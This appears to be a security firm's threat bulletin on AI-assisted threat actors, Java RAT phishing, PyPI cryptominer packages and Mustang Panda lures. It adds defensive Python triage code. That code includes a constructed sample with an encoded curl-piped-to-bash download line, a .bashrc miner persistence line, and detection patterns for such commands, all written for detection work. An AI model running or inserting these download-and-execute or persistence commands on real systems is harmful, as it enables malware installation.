The level of global cyber threats continues to rise amid political instability centered on the Middle East, Ukraine, and China and Taiwan. The number of cybersecurity incidents keeps growing, and so does their impact. Organizations of every size and sector need to raise their awareness of both the overall threat environment and the threats specific to their organization or industry. Threat hunting, offered as part of Marcum Technology's managed security services, can help provide this visibility by identifying potential risks to your organization.
Below are the top four threats that have emerged over the past month.
Stay ahead of threat actors in the age of AI
While some financial analysts worry about an artificial intelligence (AI) bubble, because the technology has yet to deliver on its loftiest promises, security analysts are focused on something more concrete: the capabilities, speed, and scale of operations that AI now puts in the hands of threat actors.
Over the past year, the speed, scale, and sophistication of attacks have grown alongside the spread of large language models (LLMs). Thankfully, AI can be and is being leveraged by defenders as well, provided they deploy it quickly.
AI largely eliminates the classic grammar and spelling errors that once gave phishing emails away. It also raises the complexity and power of whatever script an attacker sets out to write, which greatly increases the chance of a successful attack.
AI's ability to translate material accurately, explain a given concept, and generate solutions to problems closes the gap between non-English-speaking attackers and the rest of the internet; language barriers continue to disappear. When properly prompted, its ability to provide the right advice and solve problems keeps reducing the overhead of any attack.
On the phishing front, the North Korean threat actor Emerald Sleet is running spear-phishing attacks against foreign individuals who hold valuable information. The group uses AI to research known vulnerabilities, troubleshoot technical issues, and even obtain a kind of technical support while learning new technologies.
Crimson Sandstorm, an Iranian group, also uses AI for the most obvious purpose, writing phishing emails, and to good effect: it uses them to lure political dissidents to its websites and extract information from them. A more powerful use is having the LLM generate scripts and code snippets for malware, and the group has also been observed using AI to help develop obfuscation and evasion code.
Charcoal Typhoon, a group originating from China, targets government, higher education, telecommunications, oil and gas, and IT organizations, and has been using AI in much the same way. Combined with its previously demonstrated offensive capabilities and its stated interest in building its own LLM, this makes it a particularly worrying threat.
The bottom line is that AI will not solve every problem, but it can help solve problems more efficiently and effectively. Like any other tool, it is used on both sides of the conflict: productively and defensively by one side, maliciously by an ever-growing population of threat actors. And while this technology makes attackers of every size more dangerous and capable, another AI-powered threat is quietly gaining ground, one about which surprisingly little is known. In 2022 an estimated 50% of all internet traffic was generated by bots, and malicious bots accounted for roughly 30% of it. Most of that activity was ticket scalping, promotion fraud, and other forms of spam.
With the arrival of AI, a stranger trend is emerging: entirely fake social media profiles that join conversations and comment threads with no obvious scam, sales pitch, or motive beyond passing as a real person in a real conversation. This may be the most concerning development of all. While cybersecurity teams are busy putting out fires set by espionage and financially motivated attackers, this threat goes largely unnoticed, and its long-term effects are almost impossible to predict, let alone counter.
VCURMS and STRRAT phishing campaigns
FortiGuard Labs has discovered a phishing campaign distributing a malicious Java downloader that spreads two remote access Trojans (RATs), the new VCURMS and STRRAT. The attackers stored their malware on public services such as AWS and GitHub and used commercial protectors to evade detection.
The phishing emails targeted staff and asked them to click a button to confirm payment information, which downloaded a malicious JAR file. The JAR, obfuscated with Sense Shield Virbox Protector, then downloaded the additional malware.
One of these, VCURMS, is a standalone RAT delivered as a file named windows.jar that uses a Protonmail email address for command and control. It copies itself to the Startup folder and identifies each victim by computer name and volume ID. The keylogger and password-recovery modules it uses were likewise hosted on AWS and disguised with a .jpg extension. VCURMS ultimately steals account information from applications such as Discord and Steam and collects cookies, autofill data, browsing history, and passwords from browsers including Brave, Chrome, Edge, Firefox, Opera, Opera GX, Vivaldi, and Yandex.
The campaign also delivered STRRAT, which is protected with the Allatori and Branchlock obfuscation tools. Decrypting its AES-encrypted configuration file revealed the command and control server and the identifier 'Khonsari'.
This multi-pronged campaign leaned on obfuscation to evade detection and on email for command and control, and deployed several malicious programs at once.
PyPI package installs CoinMiners on Linux machines
In late December, FortiGuard's detection system identified three Python Package Index (PyPI) packages that install CoinMiner on Linux when imported. They are named modularseven-1.0, driftme-1.0, and catme-1.0 and were published by a user named "sastra". They closely resemble the "culturestreak" package seen in late 2023, as the attack stages involved are very similar.
The attack begins in the package's __init__.py, which invokes the processor.py module to decode embedded strings into shell commands. Those commands retrieve the script "unmi.sh", which hosts the second stage. The "unmi.sh" script in turn downloads two items: the mining configuration "config.json" and the CoinMiner executable, which does the actual damage.
The attacker also appends commands to the user's ~/.bashrc file to ensure persistence, so the malware is reactivated whenever a new Bash session starts. According to VirusTotal, the CoinMiner ELF binary downloaded alongside config.json is already flagged as malicious by a significant number of security vendors.
The packages' indicators of compromise (IoCs) match those of 'culturestreak': the files are hosted in a GitLab repository previously associated with the domain 'papiculo.net' and with the blocked user. The IoCs suggest that the same attackers who were behind 'culturestreak' are now operating under a new account.
These packages have advanced in concealing their payloads and maintaining functionality, in particular by moving the malicious commands into an external "unmi.sh" file to evade detection and by injecting commands into ~/.bashrc for persistence. This indicates that the attackers are refining their tactics to extend and conceal their exploits.
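The following is an added example, not FortiGuard's code and not code from the packages themselves, showing how a practitioner could triage a package's source for the pattern just described: an __init__.py that hands off to a helper module, a base64 literal that decodes to a download-piped-to-shell command, and a ~/.bashrc that has picked up a persistence line. The module names, the encoded command, the URL example.invalid and the .bashrc contents it builds are constructed stand-ins, and the regular expressions are heuristics rather than a complete detector.

```python
# Added example: static triage for an __init__.py that hands off to a helper
# module which decodes an embedded string into a shell command, plus a check of
# ~/.bashrc for injected persistence. Sample package and .bashrc are constructed.
import ast
import base64
import re

# Functions that execute a string as a shell command.
SHELL_SINKS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_output"}
# Shell fragments typical of a second stage and of persistence.
SHELL_PATTERNS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b", "download piped to shell"),
    (r">>\s*\S*\.bashrc", "append to .bashrc"),
    (r"\b(nohup|setsid)\b", "detach to background"),
]
# Paths and tools that do not belong in a login script.
BASHRC_SUSPECT = re.compile(r"(/tmp/|/dev/shm/|\bcurl\b|\bwget\b|\bnohup\b|base64\s+-d)")


def dotted(node):
    """'os.system' for an attribute chain, 'run' for a bare name, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def string_constants(tree):
    """Module-level NAME = 'literal' assignments, so b64decode(NAME) can be resolved."""
    consts = {}
    for node in tree.body:
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant):
            for target in node.targets:
                if isinstance(target, ast.Name) and isinstance(node.value.value, (str, bytes)):
                    consts[target.id] = node.value.value
    return consts


def decoded_strings(tree):
    """Plaintext of every base64 literal (or literal-backed name) passed to b64decode."""
    consts = string_constants(tree)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and dotted(node.func) == "base64.b64decode":
            for arg in node.args:
                value = arg.value if isinstance(arg, ast.Constant) else consts.get(getattr(arg, "id", None))
                if isinstance(value, (str, bytes)):
                    raw = value.encode() if isinstance(value, str) else value
                    try:
                        yield base64.b64decode(raw, validate=True).decode("utf-8", "replace")
                    except (ValueError, UnicodeDecodeError):
                        continue


def triage_sources(sources):
    """sources: {filename: python_source}. Returns sorted (filename, finding) pairs."""
    findings = set()
    for name, source in sources.items():
        tree = ast.parse(source, filename=name)
        for node in ast.walk(tree):
            if isinstance(node, ast.Call) and dotted(node.func) in SHELL_SINKS:
                findings.add((name, f"line {node.lineno}: shell sink {dotted(node.func)}"))
        # Scan decoded literals and the plain source; not every author bothers to encode.
        for text in list(decoded_strings(tree)) + [source]:
            for pattern, label in SHELL_PATTERNS:
                if re.search(pattern, text):
                    findings.add((name, label))
    return sorted(findings)


def bashrc_persistence(bashrc_text):
    """Non-comment .bashrc lines that reference temp paths or download tools."""
    return [line.strip() for line in bashrc_text.splitlines()
            if not line.lstrip().startswith("#") and BASHRC_SUSPECT.search(line)]


# Constructed look-alike package; the blob is encoded here only so the sample stays readable.
STAGE_TWO = base64.b64encode(b"curl -s http://example.invalid/unmi.sh | bash").decode()
SAMPLE_PACKAGE = {
    "__init__.py": "from .processor import run\nrun()\n",
    "processor.py": (
        "import base64, os\n"
        f"CMD = '{STAGE_TWO}'\n"
        "def run():\n"
        "    os.system(base64.b64decode(CMD).decode())\n"),
}
SAMPLE_BASHRC = """# ~/.bashrc (constructed sample)
export PATH=$HOME/bin:$PATH
alias ll='ls -l'
nohup /tmp/.x/CoinMiner -c /tmp/.x/config.json >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for name, finding in triage_sources(SAMPLE_PACKAGE):
        print(f"{name}: {finding}")
    for line in bashrc_persistence(SAMPLE_BASHRC):
        print(f".bashrc: {line}")
```

To run it against a package already unpacked on disk, feed triage_sources a dict such as {p.name: p.read_text() for p in Path(pkg_dir).rglob("*.py")}. The triage parses source with ast rather than importing it, so the package's __init__.py never executes; that matters here, because in the campaign above import is exactly the trigger.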
These packaging trends call for improved detection capabilities within the security community and highlight the importance of diligence when dealing with code from unverified sources. This incident illustrates the continuing evolution of malware tactics and the need for continued vigilance. Run only code that comes from a source you have verified, and review third-party packages before installing them.
New Mustang Panda malware package
During the ASEAN-Australia Special Summit in March 2024, researchers found evidence of cyber threats targeting Asian countries. Two distinct malware packages appeared at the same time as the summit and are believed to be the work of the threat actor known as Mustang Panda, also tracked as Camaro Dragon, Earth Preta, and Stately Taurus.
The first package, named "Talking_Points_for_China.zip", was created on March 4, 2024, and distributed to organizations in the Philippines, Japan, and Singapore. The ZIP archive contained two files, among them an executable disguised as a legitimate anti-keylogging program. Once executed, it sideloads a malicious DLL and opens connections to potentially harmful IP addresses.
In a change of tactics, a second package labeled "Note PSO.scr" appeared on March 5, 2024, targeting businesses in Myanmar. Unlike the earlier method, this package used the screensaver (SCR) executable extension to deliver its payload. Once opened, it attempted to download a malicious file from a specific URL, disguised as a benign program to avoid detection.
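Both the VCURMS campaign and the Mustang Panda packages above rely on a file's name saying one thing while its bytes say another: VCURMS hid JAR payloads behind a .jpg extension, and Mustang Panda shipped a PE executable beside the DLL it sideloads and, the next day, a PE under a .scr extension. The following added example, which is not code from FortiGuard or from the researchers who reported Mustang Panda, classifies files by magic bytes instead of extension and flags those mismatches along with an EXE-plus-DLL pair inside one archive. Every file name and byte string it uses is a constructed stand-in, not a real sample.

```python
# Added example: content-vs-extension triage. Classify files by magic bytes, flag
# names that disagree with the bytes (.jpg holding a JAR, .scr holding a PE) and
# flag an archive that bundles an executable with a DLL. Samples are constructed.
import io
import zipfile
from pathlib import PurePath

# Magic bytes -> content kind; first match wins.
MAGIC = [
    (b"MZ", "pe"),            # EXE, DLL, SCR and CPL all carry the DOS stub
    (b"PK\x03\x04", "zip"),   # ZIP, and therefore JAR/DOCX/APK
    (b"\x7fELF", "elf"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG", "png"),
]
# What the extension claims the content is.
EXT_KIND = {".exe": "pe", ".dll": "pe", ".scr": "pe", ".cpl": "pe",
            ".zip": "zip", ".jar": "jar", ".jpg": "jpeg", ".jpeg": "jpeg",
            ".png": "png"}


def sniff(data: bytes) -> str:
    """Classify by magic number; a ZIP carrying a Java manifest is reported as 'jar'."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            if kind == "zip":
                try:
                    with zipfile.ZipFile(io.BytesIO(data)) as zf:
                        if "META-INF/MANIFEST.MF" in zf.namelist():
                            return "jar"
                except zipfile.BadZipFile:
                    pass
            return kind
    return "unknown"


def triage_file(name: str, data: bytes):
    """Return a finding string for one file, or None if name and content agree."""
    ext = PurePath(name).suffix.lower()
    actual = sniff(data)
    claimed = EXT_KIND.get(ext)
    if actual == "unknown" or claimed is None:
        return None
    if claimed != actual:
        return f"{name}: extension claims {claimed} but content is {actual}"
    if ext == ".scr":
        return f"{name}: PE delivered as a screensaver (.scr runs like .exe)"
    return None


def triage_archive(zip_bytes: bytes):
    """Triage every member of a ZIP and flag an executable shipped next to a DLL."""
    findings, pes, dlls = [], [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            finding = triage_file(info.filename, data)
            if finding:
                findings.append(finding)
            if sniff(data) == "pe":
                (dlls if info.filename.lower().endswith(".dll") else pes).append(info.filename)
    if pes and dlls:
        findings.append(f"{pes[0]} + {dlls[0]}: executable and DLL shipped together (possible sideloading bundle)")
    return findings


# Constructed stand-ins, not real malware bytes.
PE_STUB = b"MZ" + bytes(62)                 # DOS header magic plus padding
JPEG_STUB = b"\xff\xd8\xff\xe0" + bytes(16)  # start of a genuine JPEG


def make_sample_jar() -> bytes:
    """A minimal JAR: a manifest and one class-file placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Main\n")
        zf.writestr("Main.class", b"\xca\xfe\xba\xbe" + bytes(8))
    return buf.getvalue()


def make_sample_archive() -> bytes:
    """A lure ZIP carrying an EXE and the DLL it would sideload (names are invented)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Talking_Points.exe", PE_STUB)
        zf.writestr("helper.dll", PE_STUB)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_file("payload.jpg", make_sample_jar()))  # JAR behind a .jpg name
    print(triage_file("Note PSO.scr", PE_STUB))           # PE behind a .scr name
    print(triage_file("photo.jpg", JPEG_STUB))            # None: genuine JPEG
    for line in triage_archive(make_sample_archive()):
        print(line)
```

The point of sniffing first is that the check cannot be defeated by renaming: a JAR is a JAR whether it is called windows.jar or something.jpg, and a .scr is loaded by Windows exactly like an .exe. A real triage pipeline would also walk the PE import table of the EXE to confirm it actually loads the bundled DLL, which this example does not attempt.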
In addition, recently discovered network connections between ASEAN-affiliated entities and the command and control (C2) infrastructure of Chinese APT groups point to compromised environments. This highlights that ASEAN countries are attractive targets for espionage because of their involvement in sensitive regional issues.
Timeline analysis revealed a clear pattern of activity aligned with Chinese working hours, with a marked lull during Chinese holidays and special business days. This consistency suggests an organized and planned cyber-espionage operation. Organizations are urged to use this information to strengthen their defenses against such threats, which highlights the importance of proactive cybersecurity measures.
If you are facing challenges related to cybersecurity threats, breaches, and fraud, or would like to learn more about identifying potential threats to your organization, contact Marcum Technology today.